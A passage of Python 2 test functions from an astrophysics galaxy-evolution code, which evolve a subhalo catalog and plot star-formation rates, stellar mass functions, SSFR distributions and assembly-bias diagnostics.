subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(nsnap0),
theta_SFMS=eev.theta_sfms) + subcat['m.star0'][isSF[i_rand]])[0]]
sub.text(UT.t_nsnap(nsnap0 - i) + 0.1, dsfrs[0] + 0.02, '$\mathcal{M}_* \sim $'+str(m_bin[i]), fontsize=15)
for nn in range(2, nsnap0)[::-1]:
M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
mu_sfr = Obvs.SSFR_SFMS(M_nn, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
mu_sfr = Obvs.SSFR_SFMS(subcat['m.star'][isSF[i_rand]],
UT.z_nsnap(1), theta_SFMS=eev.theta_sfms) + subcat['m.star'][isSF[i_rand]]
dsfrs.append(subcat['sfr'][isSF[i_rand]] - mu_sfr[0])
sub.plot(UT.t_nsnap(range(1,nsnap0+1)[::-1]), dsfrs, c=pretty_colors[i], lw=2)
sub.plot([UT.t_nsnap(nsnap0), UT.t_nsnap(1)], [0.3, 0.3], c='k', ls='--', lw=2)
sub.plot([UT.t_nsnap(nsnap0), UT.t_nsnap(1)], [-0.3, -0.3], c='k', ls='--', lw=2)
sub.set_xlim([UT.t_nsnap(nsnap0), UT.t_nsnap(1)])
sub.set_xlabel('$t_{cosmic}$', fontsize=25)
sub.set_ylim([-1., 1.])
sub.set_ylabel('$\Delta$log SFR', fontsize=25)
fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
fig.savefig(''.join([UT.fig_dir(), sfh+'_eval.png']), bbox_inches='tight')
plt.close()
return None
def test_Evolver_AssemblyBias(sig_corr, nsnap0=None, downsampled=None):
''' Test assembly bias is implementation
'''
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
subcat = subhist.Read(downsampled=downsampled)
# load in generic theta (parameter values)
theta = Evol.defaultTheta('random_step_abias')
theta['sfh']['sigma_corr'] = sig_corr
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.Initiate()
eev.Evolve()
subcat = eev.SH_catalog
prettyplot()
pretty_colors = prettycolors()
isSF = np.where(subcat['gclass'] == 'star-forming')[0]
fig = plt.figure(figsize=(25,7))
sub = fig.add_subplot(1,3,1)
smhmr = Obvs.Smhmr()
m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
# also plot the SHAM SMHMR
m_mid, mu_msham, sig_msham, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.sham'][isSF])
sub.plot(m_mid, mu_msham + sig_msham, ls='--', c='k')
sub.plot(m_mid, mu_msham - sig_msham, ls='--', c='k')
sub.set_xlim([10.5, 14.])
sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
sub.set_ylim([8., 12.])
sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
sub = fig.add_subplot(1,3,2)
sub.plot(m_mid, sig_mstar, label='$\sigma_{M_*}$')
sub.plot(m_mid, sig_msham, label='$\sigma_{M_{sham}}$')
sub.set_xlim([10.5, 14.])
sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
sub.set_ylim([0., 0.5])
sub.set_ylabel('$\sigma$', fontsize=25)
sub.legend(loc='upper right')
sub = fig.add_subplot(1,3,3)
isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap0))[0]
i_rand = np.random.choice(isSF, size=5000, replace=False)#[0]
for n in range(1, nsnap0)[::-1]:
if n == 1:
Mstar_n = subcat['m.star'][i_rand]
Mhalo_n = subcat['halo.m'][i_rand]
SFR_n = subcat['sfr'][i_rand]
else:
Mstar_n = subcat['snapshot'+str(n)+'_m.star'][i_rand]
Mhalo_n = subcat['snapshot'+str(n)+'_halo.m'][i_rand]
SFR_n = subcat['snapshot'+str(n)+'_sfr'][i_rand]
Mstar_n_1 = subcat['snapshot'+str(n+1)+'_m.star'][i_rand]
Mhalo_n_1 = subcat['snapshot'+str(n+1)+'_halo.m'][i_rand]
mu_sfr = Obvs.SSFR_SFMS(Mstar_n, UT.z_nsnap(n), theta_SFMS=eev.theta_sfms) + Mstar_n
dsfrs = SFR_n - mu_sfr
#mu_sfr = Obvs.SSFR_SFMS(Mstar_n, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
#for nn in range(2, nsnap0)[::-1]:
# #M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
# mu_sfr = Obvs.SSFR_SFMS(Mstar_n, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
# dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
#dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
# subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(20),
# theta_SFMS=eev.theta_sfms) + subcat['m.star0'][isSF[i_rand]])[0]]
dMstar = Mstar_n - Mstar_n_1
dMhalo = Mhalo_n - Mhalo_n_1
sub.scatter(dMhalo, dMstar, lw=0)
#sub.scatter(dMhalo, 0.3 * np.random.randn(len(dMhalo)), c='k')
#print np.std(dsfrs)
#sub.scatter(dMhalo, dsfrs, lw=0)
sub.set_xlim([-0.5, 0.5])
sub.set_xlabel('$\Delta$ log $M_{halo}$', fontsize=25)
#sub.set_ylabel('$\Delta$ log $M_*$', fontsize=25)
sub.set_ylim([-1., 1.])
sub.set_ylabel('$\Delta$ log SFR', fontsize=25)
fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
plt.show()
return None
def test_AssemblyBias(sig_corr, nsnap0=None, downsampled=None):
''' Test how assembly bias is implemented by comparing the distribution of (D SFR, D Mhalo)
for SF galaxies.
################################################
test seems successful
################################################
'''
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
subcat = subhist.Read(downsampled=downsampled)
# load in generic theta (parameter values)
theta = Evol.defaultTheta('random_step_abias')
theta['sfh']['sigma_corr'] = sig_corr # with specified correlation (assembly bias)
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.Initiate()
eev.Evolve()
subcat = eev.SH_catalog
#prettyplot()
pretty_colors = prettycolors()
# pick 5000 star forming galaxies with halos since nsnap0
isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap0) & (subcat['weights'] > 0.))[0]
i_rand = np.random.choice(isSF, size=5000, replace=False)#[0]
for n in range(1, nsnap0)[::-1]:
fig = plt.figure(figsize=(7,7))
sub = fig.add_subplot(1,1,1)
if n == 1:
Mstar_n = subcat['m.star'][i_rand]
Mhalo_n = subcat['halo.m'][i_rand]
SFR_n = subcat['sfr'][i_rand]
else:
Mstar_n = subcat['snapshot'+str(n)+'_m.star'][i_rand]
Mhalo_n = subcat['snapshot'+str(n)+'_halo.m'][i_rand]
SFR_n = subcat['snapshot'+str(n)+'_sfr'][i_rand]
Mstar_n_1 = subcat['snapshot'+str(n+1)+'_m.star'][i_rand]
Mhalo_n_1 = subcat['snapshot'+str(n+1)+'_halo.m'][i_rand]
# delta SFR
mu_sfr = Obvs.SSFR_SFMS(Mstar_n, UT.z_nsnap(n), theta_SFMS=eev.theta_sfms) + Mstar_n
dsfrs = SFR_n - mu_sfr
dMstar = Mstar_n - Mstar_n_1
dMhalo = Mhalo_n - Mhalo_n_1
#sub.scatter(dMhalo, dMstar, lw=0)
sub.scatter(dMhalo, 0.3 * np.random.randn(len(dMhalo)), c='k')
#print np.std(dsfrs)
sub.scatter(dMhalo, dsfrs, lw=0)
sub.set_xlim([-0.5, 0.5])
sub.set_xlabel('$\Delta$ log $M_{halo}$', fontsize=25)
#sub.set_ylabel('$\Delta$ log $M_*$', fontsize=25)
#sub.set_ylim([-1., 1.])
sub.set_ylabel('$\Delta$ log SFR', fontsize=25)
plt.show()
plt.close()
#fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
#plt.show()
return None
def test_EvolverInitiate(test, nsnap, nsnap0=20, downsampled=None):
''' Tests for Initiate method in Evolver for specified nsnap snapshot.
'''
if nsnap > nsnap0:
raise ValueError('nsnap has to be less than or equal to nsnap0')
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
subcat = subhist.Read(downsampled=downsampled)
theta = Evol.defaultTheta('constant_offset') # load in generic theta (parameters)
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.Initiate()
if test == 'pssfr': # calculate P(SSFR)
obv_ssfr = Obvs.Ssfr()
started = np.where(subcat['nsnap_start'] == nsnap)
ssfr_bin_mids, ssfr_dists = obv_ssfr.Calculate(
subcat['m.star0'][started],
subcat['sfr0'][started]-subcat['m.star0'][started],
weights=subcat['weights'][started])
fig = plt.figure(figsize=(20, 5))
bkgd = fig.add_subplot(111, frameon=False)
panel_mass_bins = [[9.7, 10.1], [10.1, 10.5], [10.5, 10.9], [10.9, 11.3]]
for i_m, mass_bin in enumerate(panel_mass_bins):
sub = fig.add_subplot(1, 4, i_m+1)
sub.plot(ssfr_bin_mids[i_m], ssfr_dists[i_m],
lw=3, ls='-', c='k')
# mark the SSFR of SFMS and Quiescent peak
sub.vlines(Obvs.SSFR_SFMS(0.5 * np.sum(mass_bin), UT.z_nsnap(20), theta_SFMS=theta['sfms']), 0., 1.7,
color='b', linewidth=3)
sub.vlines(Obvs.SSFR_Qpeak(0.5 * np.sum(mass_bin)), 0., 1.7,
color='r', linewidth=3)
massbin_str = ''.join([
r'$\mathtt{log \; M_{*} = [',
str(mass_bin[0]), ',\;',
str(mass_bin[1]), ']}$'
])
sub.text(-12., 1.4, massbin_str, fontsize=20)
# x-axis
sub.set_xlim([-13., -8.])
# y-axis
sub.set_ylim([0.0, 1.7])
sub.set_yticks([0.0, 0.5, 1.0, 1.5])
if i_m == 0:
sub.set_ylabel(r'$\mathtt{P(log \; SSFR)}$', fontsize=25)
else:
sub.set_yticklabels([])
ax = plt.gca()
leg = sub.legend(bbox_to_anchor=(-8.5, 1.55), loc='upper right', prop={'size': 20}, borderpad=2,
bbox_transform=ax.transData, handletextpad=0.5)
bkgd.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
bkgd.set_xlabel(r'$\mathtt{log \; SSFR \;[yr^{-1}]}$', fontsize=25)
plt.show()
elif test == 'fq': # calculate quiescent fraction
obv_fq = Obvs.Fq()
pretty_colors = prettycolors()
fig = plt.figure(figsize=(6,6))
sub = fig.add_subplot(111)
started = np.where(subcat['nsnap_start'] == nsnap)
print len(started[0]), ' galaxies'
print np.sum(subcat['weights'][started])
m_mid, fq, counts = obv_fq.Calculate(
mass=subcat['m.star0'][started],
sfr=subcat['sfr0'][started],
z=UT.z_nsnap(nsnap), weights= subcat['weights'][started], theta_SFMS=theta['sfms'], counts=True)
cc = pretty_colors[nsnap]
sub.scatter(m_mid, fq, c=cc, s=10)
sub.plot(m_mid, fq, c=cc)
sub.plot(m_mid, obv_fq.model(m_mid, UT.z_nsnap(nsnap), lit='cosmos_tinker'), c=cc, ls='--')
for i in range(len(m_mid)):
sub.text(m_mid[i], 0.05+fq[i], str(counts[i]))
plt.show()
elif test == 'smf_evol': # check the SMF evolution of the SF population
fig = plt.figure(figsize=(7,7))
sub = fig.add_subplot(111)
for n in range(2, 21)[::-1]:
# identify SF population at snapshot
pop_sf = np.where(
(subcat['gclass0'] == 'star-forming') &
(subcat['nsnap_quench'] <= n) &
(subcat['weights'] > 0.)
)
smf_sf = Obvs.getMF(
subcat['snapshot'+str(n)+'_m.sham'][pop_sf],
weights=subcat['weights'][pop_sf])
sub.plot(smf_sf[0], smf_sf[1], lw=2, c='k', alpha=0.05 * (21. - n))#, label='Snapshot '+str(n))
pop_sf = np.where(
(subcat['gclass'] == 'star-forming') &
(subcat['weights'] > 0.)
)
smf_sf = Obvs.getMF(
subcat['m.sham'][pop_sf],
weights=subcat['weights'][pop_sf])
sub.plot(smf_sf[0], smf_sf[1], lw=3, c='k', ls='--', label='Snapshot 1')
sub.set_xlim([6., 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylim([1e-5, 10**-1.5])
sub.set_yscale('log')
sub.set_ylabel('$\Phi$', fontsize=25)
sub.legend(loc='upper right')
plt.show()
elif test == 'smf_M0': # check the SMF of galaxies with M_sham(z0) = 0
fig = plt.figure(figsize=(7,7))
sub = fig.add_subplot(111)
blank = np.where((subcat['snapshot20_m.sham'] == 0.) & (subcat['weights'] > 0.))
smf_blank = Obvs.getMF(subcat['m.sham'][blank], weights=subcat['weights'][blank])
smf_tot = Obvs.getMF(subcat['m.sham'], weights=subcat['weights'])
sub.plot(smf_tot[0], smf_blank[1]/smf_tot[1], lw=3, c='k', ls='-')
sub.set_xlim([6., 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
#sub.set_ylim([1e-5, 10**-1.5])
#sub.set_yscale('log')
#sub.set_ylabel('$\Phi$', fontsize=25)
plt.show()
return None
def test_EvolverInitSF(nsnap, nsnap0=20, downsampled=None):
''' Checks whether or not the SF populations from Evolver.InitSF
method correctly produces SFRs on the SFMS.
'''
if nsnap > nsnap0:
raise ValueError('nsnap has to be less than or equal to nsnap0')
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralSubhalos(nsnap0=nsnap0)
subcat = subhist.Read(downsampled=downsampled)
theta = Evol.defaultTheta('constant_offset') # load in generic theta (parameters)
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.InitSF()
obv_ssfr = Obvs.Ssfr()
started = np.where(subcat['nsnap_start'] == nsnap)
ssfr_bin_mids, ssfr_dists = obv_ssfr.Calculate(
subcat['m.star0'][started],
subcat['sfr0'][started]-subcat['m.star0'][started],
weights=subcat['weights'][started])
fig = plt.figure(figsize=(20, 5))
bkgd = fig.add_subplot(111, frameon=False)
panel_mass_bins = [[9.7, 10.1], [10.1, 10.5], [10.5, 10.9], [10.9, 11.3]]
for i_m, mass_bin in enumerate(panel_mass_bins):
sub = fig.add_subplot(1, 4, i_m+1)
sub.plot(ssfr_bin_mids[i_m], ssfr_dists[i_m],
lw=3, ls='-', c='k')
# mark the SSFR of SFMS and Quiescent peak
sub.vlines(Obvs.SSFR_SFMS(0.5 * np.sum(mass_bin), UT.z_nsnap(nsnap), theta_SFMS=theta['sfms']), 0., 1.7,
color='b', linewidth=3)
sub.vlines(Obvs.SSFR_Qpeak(0.5 * np.sum(mass_bin)), 0., 1.7,
color='r', linewidth=3)
massbin_str = ''.join([
r'$\mathtt{log \; M_{*} = [',
str(mass_bin[0]), ',\;',
str(mass_bin[1]), ']}$'
])
sub.text(-12., 1.4, massbin_str, fontsize=20)
# x-axis
sub.set_xlim([-13., -8.])
# y-axis
sub.set_ylim([0.0, 1.7])
sub.set_yticks([0.0, 0.5, 1.0, 1.5])
if i_m == 0:
sub.set_ylabel(r'$\mathtt{P(log \; SSFR)}$', fontsize=25)
else:
sub.set_yticklabels([])
ax = plt.gca()
leg = sub.legend(bbox_to_anchor=(-8.5, 1.55), loc='upper right', prop={'size': 20}, borderpad=2,
bbox_transform=ax.transData, handletextpad=0.5)
bkgd.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
bkgd.set_xlabel(r'$\mathtt{log \; SSFR \;[yr^{-1}]}$', fontsize=25)
plt.show()
return None
def test_EvolverEvolve(test, nsnap0=20, downsampled=None):
''' Tests for Evolve method in Evolver
'''
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
subcat = subhist.Read(downsampled=downsampled)
# load in generic theta (parameter values)
theta = Evol.defaultTheta()
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.Initiate()
eev.Evolve()
subcat = eev.SH_catalog
pretty_colors = prettycolors()
if test == 'smf':
isSF = np.where(subcat['gclass'] == 'star-forming')
fig = plt.figure(figsize=(7,7))
sub = fig.add_subplot(111)
for n in range(2, 21)[::-1]:
# identify SF population at snapshot
smf_sf = Obvs.getMF(
subcat['snapshot'+str(n)+'_m.star'][isSF],
weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
smf_sf_msham0 = Obvs.getMF(subcat['m.star0'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf_msham0[0], smf_sf_msham0[1], lw=3, c='k', ls='--')
smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
print np.sum(subcat['m.star'][isSF] < 0.)
print subcat['m.star'][isSF].min(), subcat['m.star'][isSF].max()
#raise ValueError
smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
sub.set_xlim([6., 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylim([1e-6, 10**-1.75])
sub.set_yscale('log')
sub.set_ylabel('$\Phi$', fontsize=25)
sub.legend(loc='upper right')
plt.show()
elif test == 'smf_comp': # SMF of composition
isSF = np.where(subcat['gclass'] == 'star-forming')[0]
fig = plt.figure(figsize=(15,7))
sub = fig.add_subplot(121)
#smf_sf_msham0 = Obvs.getMF(subcat['m.star0'][isSF], weights=subcat['weights'][isSF])
#sub.plot(smf_sf_msham0[0], smf_sf_msham0[1], lw=3, c='k', ls='--')
m0s = subcat['m.star0'][isSF]
mlow = np.arange(m0s.min(), m0s.max(), 0.5)
for i_m in range(len(mlow)):
inMbin = np.where((subcat['m.star0'][isSF] > mlow[i_m]) & (subcat['m.star0'][isSF] < mlow[i_m] + 0.5))
smf_sf = Obvs.getMF(subcat['m.star'][isSF[inMbin]], weights=subcat['weights'][isSF[inMbin]])
if i_m == 0:
smf_sf0 = np.zeros(len(smf_sf[0]))
smf_sf1 = smf_sf[1]
else:
smf_sf1 = smf_sf0 + smf_sf[1]
mbin_label = ''.join([str(mlow[i_m])+', '+str(mlow[i_m] + 0.5)])
sub.fill_between(smf_sf[0], smf_sf0, smf_sf1,
facecolor=pretty_colors[i_m % 20], edgecolor=None, lw=0)#, label=mbin_label)
smf_sf0 = smf_sf1
smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=3, c='k', ls='-')
sub.set_xlim([6., 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylim([1e-6, 10**-1.75])
sub.set_yscale('log')
sub.set_ylabel('$\Phi$', fontsize=25)
#sub.legend(loc='upper right')
sub = fig.add_subplot(122)
m0s = subcat['m.star0'][isSF]
mlow = np.arange(m0s.min(), m0s.max(), 0.5)
for i_m in range(len(mlow)):
inMbin = np.where((subcat['m.star0'][isSF] > mlow[i_m]) & (subcat['m.star0'][isSF] < mlow[i_m] + 0.5))
smf_sf = Obvs.getMF(subcat['m.sham'][isSF[inMbin]], weights=subcat['weights'][isSF[inMbin]])
if i_m == 0:
smf_sf0 = np.zeros(len(smf_sf[0]))
smf_sf1 = smf_sf[1]
else:
smf_sf1 = smf_sf0 + smf_sf[1]
mbin_label = ''.join([str(mlow[i_m])+', '+str(mlow[i_m] + 0.5)])
sub.fill_between(smf_sf[0], smf_sf0, smf_sf1,
facecolor=pretty_colors[i_m % 20], edgecolor=None, lw=0)#, label=mbin_label)
smf_sf0 = smf_sf1
smf_sf = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=3, c='k', ls='-')
sub.set_xlim([6., 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_{SHAM})$', fontsize=25)
sub.set_ylim([1e-6, 10**-1.75])
sub.set_yscale('log')
plt.show()
elif test == 'pssfr':
obv_ssfr = Obvs.Ssfr()
isSF = np.where(subcat['gclass'] == 'star-forming')
ssfr_bin_mids, ssfr_dists0 = obv_ssfr.Calculate(subcat['m.star0'][isSF],
subcat['sfr0'][isSF]-subcat['m.star0'][isSF],
subcat['weights'][isSF])
ssfr_bin_mids, ssfr_dists = obv_ssfr.Calculate(subcat['m.star'][isSF],
subcat['sfr'][isSF]-subcat['m.star'][isSF],
subcat['weights'][isSF])
fig = plt.figure(figsize=(20, 5))
bkgd = fig.add_subplot(111, frameon=False)
panel_mass_bins = [[9.7, 10.1], [10.1, 10.5], [10.5, 10.9], [10.9, 11.3]]
for i_m, mass_bin in enumerate(panel_mass_bins):
sub = fig.add_subplot(1, 4, i_m+1)
sub.plot(ssfr_bin_mids[i_m], ssfr_dists0[i_m],
lw=3, ls='--', c='b')
sub.plot(ssfr_bin_mids[i_m], ssfr_dists[i_m],
lw=3, ls='-', c='k')
# mark the SSFR of SFMS and Quiescent peak
sub.vlines(Obvs.SSFR_SFMS(0.5 * np.sum(mass_bin), UT.z_nsnap(1), theta_SFMS=theta['sfms']), 0., 1.7,
color='b', linewidth=3)
sub.vlines(Obvs.SSFR_Qpeak(0.5 * np.sum(mass_bin)), 0., 1.7,
color='r', linewidth=3)
massbin_str = ''.join([
r'$\mathtt{log \; M_{*} = [',
str(mass_bin[0]), ',\;',
str(mass_bin[1]), ']}$'
])
sub.text(-12., 1.4, massbin_str, fontsize=20)
# x-axis
sub.set_xlim([-13., -8.])
# y-axis
sub.set_ylim([0.0, 1.7])
sub.set_yticks([0.0, 0.5, 1.0, 1.5])
if i_m == 0:
sub.set_ylabel(r'$\mathtt{P(log \; SSFR)}$', fontsize=25)
else:
sub.set_yticklabels([])
ax = plt.gca()
leg = sub.legend(bbox_to_anchor=(-8.5, 1.55), loc='upper right', prop={'size': 20}, borderpad=2,
bbox_transform=ax.transData, handletextpad=0.5)
bkgd.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
bkgd.set_xlabel(r'$\mathtt{log \; SSFR \;[yr^{-1}]}$', fontsize=25)
plt.show()
elif test == 'smhmr': # stellar mass to halo mass relation
isSF = np.where(subcat['gclass'] == 'star-forming')
smhmr = Obvs.Smhmr()
m_mid, mu_mhalo, sig_mhalo, cnts = smhmr.Calculate(subcat['m.star'][isSF], subcat['halo.m'][isSF])
fig = plt.figure()
sub = fig.add_subplot(111)
sub.errorbar(m_mid, mu_mhalo, yerr=sig_mhalo)
sub.fill_between(m_mid, mu_mhalo - 0.2, mu_mhalo + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
sub.set_xlim([8., 12.])
sub.set_xlabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
plt.show()
elif test == 'sfms':
isSF = np.where(subcat['gclass'] == 'star-forming')
bovy.scatterplot(subcat['m.star'][isSF], subcat['sfr'][isSF], scatter=True, s=2,
xrange=[8., 12.], yrange=[-4., 3.],
xlabel='\mathtt{log\;M_*}', ylabel='\mathtt{log\;SFR}')
m_arr = np.arange(8., 12.1, 0.1)
plt.plot(m_arr, Obvs.SSFR_SFMS(m_arr, UT.z_nsnap(1), theta_SFMS=theta['sfms']) + m_arr, c='r', lw=2, ls='-')
plt.plot(m_arr, Obvs.SSFR_SFMS(m_arr, UT.z_nsnap(1), theta_SFMS=theta['sfms']) + m_arr - 0.3, c='r', lw=2, ls='-.')
plt.plot(m_arr, Obvs.SSFR_SFMS(m_arr, UT.z_nsnap(1), theta_SFMS=theta['sfms']) + m_arr + 0.3, c='r', lw=2, ls='-.')
plt.show()
elif test == 'delMstar': # difference between sham M* and integrated M*
isSF = np.where(subcat['gclass'] == 'star-forming')
delMstar = subcat['m.star'][isSF] - subcat['m.sham'][isSF] # Delta M*
bovy.scatterplot(subcat['m.star'][isSF], delMstar, scatter=True, s=2,
xrange=[8., 12.], yrange=[-4., 4.], xlabel='\mathtt{log\;M_*}', ylabel='\mathtt{log\;M_* - log\;M_{sham}}')
plt.show()
elif test == 'delMgrowth':
isSF = np.where(subcat['gclass'] == 'star-forming')
bovy.scatterplot(subcat['m.star'][isSF], subcat['m.star'][isSF] - subcat['m.star0'][isSF], scatter=True, s=2,
xrange=[8., 12.], yrange=[-4., 4.],
xlabel=r'{\rm Integrated}\;\mathtt{log\;M_*}', ylabel='\mathtt{log\;M_* - log\;M_0}')
bovy.scatterplot(subcat['m.sham'][isSF], subcat['m.sham'][isSF] - subcat['m.star0'][isSF], scatter=True, s=2,
xrange=[8., 12.], yrange=[-4., 4.],
xlabel=r'{\rm SHAM}\;\mathtt{log\;M_*}', ylabel='\mathtt{log\;M_* - log\;M_0}')
plt.show()
elif test == 'sfh_sfms': # plot the SFH as a function of time
# first pick a random SF galaxy
isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == 20))[0]
m_bin = np.arange(9.0, 12., 0.5)
i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
fig = plt.figure()
sub = fig.add_subplot(111)
for i in np.unique(i_bin):
i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
sfrs = [subcat['sfr0'][isSF[i_rand]]]
mstars = [subcat['m.star0'][isSF[i_rand]]]
for nn in range(2, 20)[::-1]:
sfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]])
mstars.append(subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]])
sfrs.append(subcat['sfr'][isSF[i_rand]])
mstars.append(subcat['m.star'][isSF[i_rand]])
sub.scatter(mstars, sfrs, c=pretty_colors[i], lw=0)
sub.set_xlim([9.0, 13.])
sub.set_xlabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylabel('log SFR', fontsize=25)
plt.show()
elif test == 'sfh': # plot the SFH as a function of time
# first pick a random SF galaxy
isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == 20))[0]
m_bin = np.arange(9.0, 12.5, 0.5)
i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
fig = plt.figure()
sub = fig.add_subplot(111)
for i in np.unique(i_bin):
i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(20),
theta_SFMS=eev.theta_sfms) + subcat['m.star0'][isSF[i_rand]])[0]]
for nn in range(2, 20)[::-1]:
M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
mu_sfr = Obvs.SSFR_SFMS(M_nn, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
mu_sfr = Obvs.SSFR_SFMS(subcat['m.star'][isSF[i_rand]],
UT.z_nsnap(1), theta_SFMS=eev.theta_sfms) + subcat['m.star'][isSF[i_rand]]
dsfrs.append(subcat['sfr'][isSF[i_rand]] - mu_sfr[0])
sub.plot(UT.t_nsnap(range(1,21)[::-1]), dsfrs, c=pretty_colors[i], lw=2)
#sub.set_xlim([9.0, 13.])
sub.set_xlabel('$t_{cosmic}$', fontsize=25)
sub.set_ylabel('$\Delta$log SFR', fontsize=25)
plt.show()
return None
def test_assignSFRs():
''' Test that Evol.assignSFRs function is working as expected.
'''
zsnaps, tsnaps = UT.zt_table() # load in snapshot redshifts
subhist = Cat.PureCentralHistory(nsnap_ancestor=20)
subcat = subhist.Read()
# load in generic theta (parameter values)
theta = Evol.defaultTheta()
out = Evol.assignSFRs(subcat['m.star'], np.repeat(zsnaps[20], len(subcat['m.star'])),
theta_GV=theta['gv'],
theta_SFMS=theta['sfms'],
theta_FQ=theta['fq'])
# calculate their SSFRs
obv_ssfr = Obvs.Ssfr()
ssfr_bin_mids, ssfr_dists = obv_ssfr.Calculate(subcat['m.star'], out['SFR']-subcat['m.star'])
fig = plt.figure(figsize=(20, 5))
bkgd = fig.add_subplot(111, frameon=False)
panel_mass_bins = [[9.7, 10.1], [10.1, 10.5], [10.5, 10.9], [10.9, 11.3]]
for i_m, mass_bin in enumerate(panel_mass_bins):
sub = fig.add_subplot(1, 4, i_m+1)
sub.plot(ssfr_bin_mids[i_m], ssfr_dists[i_m],
lw=3, ls='-', c='k')
# mark the SSFR of SFMS and Quiescent peak
sub.vlines(Obvs.SSFR_SFMS(0.5 * np.sum(mass_bin), zsnaps[20], theta_SFMS=theta['sfms']), 0., 1.7,
color='b', linewidth=3)
sub.vlines(Obvs.SSFR_Qpeak(0.5 * np.sum(mass_bin)), 0., 1.7,
color='r', linewidth=3)
massbin_str = ''.join([
r'$\mathtt{log \; M_{*} = [',
str(mass_bin[0]), ',\;',
str(mass_bin[1]), ']}$'
])
sub.text(-12., 1.4, massbin_str, fontsize=20)
# x-axis
sub.set_xlim([-13., -8.])
# y-axis
sub.set_ylim([0.0, 1.7])
sub.set_yticks([0.0, 0.5, 1.0, 1.5])
if i_m == 0:
sub.set_ylabel(r'$\mathtt{P(log \; SSFR)}$', fontsize=25)
else:
sub.set_yticklabels([])
ax = plt.gca()
leg = sub.legend(bbox_to_anchor=(-8.5, 1.55), loc='upper right', prop={'size': 20}, borderpad=2,
bbox_transform=ax.transData, handletextpad=0.5)
